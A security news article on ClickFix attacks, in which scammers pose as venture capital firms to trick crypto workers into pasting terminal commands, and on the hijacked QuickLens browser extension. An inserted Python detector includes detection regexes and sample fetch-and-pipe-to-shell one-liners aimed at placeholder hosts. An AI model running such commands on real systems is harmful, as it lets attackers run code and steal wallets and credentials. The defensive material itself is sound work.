ClickFix hackers impersonate venture capital firms to attack crypto users; QuickLens extension hijack exposed.

MarketWhisper

ClickFix hackers impersonate venture capital firms to attack crypto users

Cybersecurity company Moonlock Lab released a report on Monday revealing the latest tactics used by cryptocurrency hackers centered around the “ClickFix” method: scammers disguise themselves as venture capital firms such as SolidBit and MegaBit to contact crypto industry professionals on LinkedIn, offering collaboration opportunities. They ultimately trick victims into executing malicious commands on their computers, stealing crypto assets.

Analysis of the ClickFix Attack Method: Turning Victims into Attackers

The core innovation of ClickFix lies in inverting the traditional malware infection pathway: instead of delivering and running a payload itself, the attacker gets the victim to do it. The attack process typically involves the following stages:

Stage 1 (LinkedIn Social Engineering): Hackers contact targets pretending to be legitimate venture capital firms, offering seemingly genuine business collaborations to establish initial trust.

Stage 2 (Fake Video Links): Targets are directed to phishing links disguised as Zoom or Google Meet, leading to a simulated “event page.”

Stage 3 (Clipboard Hijacking): The page displays a fake Cloudflare “I’m not a robot” verification box; clicking it secretly copies malicious commands to the user’s clipboard.

Stage 4 (Self-Execution): Users are prompted to open their terminal and paste the “verification code,” which actually executes the attack commands.

Moonlock Lab’s research team states: “The efficiency of ClickFix lies in transforming the victim into the execution mechanism of the attack. By having victims paste and run commands themselves, attackers bypass years of security measures—without exploiting vulnerabilities or triggering suspicious downloads.”
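The four stages above end with a command pasted into the victim's own terminal, which is also why the FAQ below notes that behavioural tools see only ordinary user activity. As an added example that is not from Moonlock's report or the article, the following Python detector looks for that Stage 4 pattern in process-creation telemetry: the JSON-lines field names, the set of interactive parent processes, the indicator regexes and the sample events are all assumptions constructed for the illustration.

```python
import json
import re

# Stage 4 one-liners typically fetch a payload and pipe it straight into a
# shell, or decode an embedded blob first. Assumed heuristics, not a vendor's.
INDICATORS = [
    (re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
     "remote fetch piped to shell"),
    (re.compile(r"\bbase64\s+(-d|-D|--decode)\b"), "inline base64 decode"),
    (re.compile(r"\bosascript\s+-e\b"), "inline AppleScript execution"),
    (re.compile(r"\bnohup\b.*&\s*$"), "backgrounded with nohup"),
]

# Interactive shells a user pastes into; a pasted 'verification code' lands
# here, whereas the same command spawned by launchd or a browser would not.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "zsh", "bash"}


def classify(event):
    """Return the indicator labels matched by one process-creation event."""
    if event.get("parent") not in INTERACTIVE_PARENTS:
        return []
    cmd = event.get("cmdline", "")
    return [label for pattern, label in INDICATORS if pattern.search(cmd)]


def scan(jsonl_text):
    """Return (pid, labels) for every event in the JSON-lines text that
    matches at least one ClickFix indicator."""
    hits = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        labels = classify(event)
        if labels:
            hits.append((event["pid"], labels))
    return hits


# Constructed sample telemetry (assumed field names); hosts are placeholders.
SAMPLE = """
{"pid": 101, "parent": "Terminal", "cmdline": "ls -la ~/Projects"}
{"pid": 102, "parent": "Terminal", "cmdline": "curl -fsSL https://verify.example/check | bash"}
{"pid": 103, "parent": "launchd", "cmdline": "/usr/bin/curl -s https://updates.example/x | sh"}
{"pid": 104, "parent": "zsh", "cmdline": "echo aGVsbG8= | base64 -d | sh"}
"""

if __name__ == "__main__":
    for pid, labels in scan(SAMPLE):
        print(pid, ", ".join(labels))
```

Event 103 is deliberately not flagged: the same fetch-and-pipe command launched by a daemon is a different (and separately detectable) situation, and tying the rule to an interactive parent is what makes it specific to the "user pastes it" pattern.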

QuickLens Hijacking Incident Details and Malicious Features List

The QuickLens hijacking case presents another attack vector—supply chain attacks targeting legitimate users:

  • February 1: Ownership of the QuickLens extension is transferred to a new owner
  • Two weeks later: The new owner releases an update containing malicious scripts
  • February 23: Security researcher Tuckner publicly discloses that the extension has been removed from the Chrome Web Store

Malicious features include:

  • Searching for and stealing crypto wallet data and seed phrases
  • Accessing user Gmail inbox contents
  • Stealing YouTube channel information
  • Intercepting login credentials and payment information entered into web forms

According to eSecurity Planet, this hijacked extension deployed both the ClickFix attack module and other info-stealing tools, indicating the operators possess multi-tool coordination capabilities.

Broader Threat Context of ClickFix

Moonlock Lab notes that the ClickFix technique has rapidly gained popularity among threat actors since 2025. Its main advantage is that it exploits human behavior rather than software vulnerabilities, sidestepping detection logic built around malicious downloads and exploits.

Microsoft Threat Intelligence warned in August 2025 that it continued to track “daily attacks targeting thousands of global enterprises and endpoints”; in a July 2025 report, cybersecurity firm Unit 42 confirmed that ClickFix had impacted multiple industries—including manufacturing, wholesale and retail, state and local governments, and utilities—far beyond just cryptocurrency.

Frequently Asked Questions

Q: Why can ClickFix attacks successfully bypass antivirus and security software?
Traditional antivirus relies on automatically identifying and blocking suspicious programs. ClickFix’s breakthrough is making “people” the executors: victims actively input and run the commands themselves, rather than malware implanting itself automatically. This makes behavioral detection tools less effective, because on the endpoint the actions look like normal user operations in a terminal.

Q: How can I identify social engineering attacks like ClickFix?
Key signs include: receiving offers of business cooperation from unfamiliar LinkedIn accounts; being prompted to enter a “verification code” or follow “fix steps” after clicking a meeting link; instructions to open a terminal and paste code; and fake verification interfaces disguised as Cloudflare or CAPTCHA checks. The security principle is simple: legitimate services never require users to run commands in a terminal to authenticate.

Q: What should QuickLens users do now?
If you have installed the QuickLens extension, remove it immediately from your browser. Also, change all potentially affected crypto wallets (generate new seed phrases and transfer funds to new wallets), and reset passwords for Gmail and other accounts. Regularly review installed browser extensions and remain highly alert to any recent ownership changes.
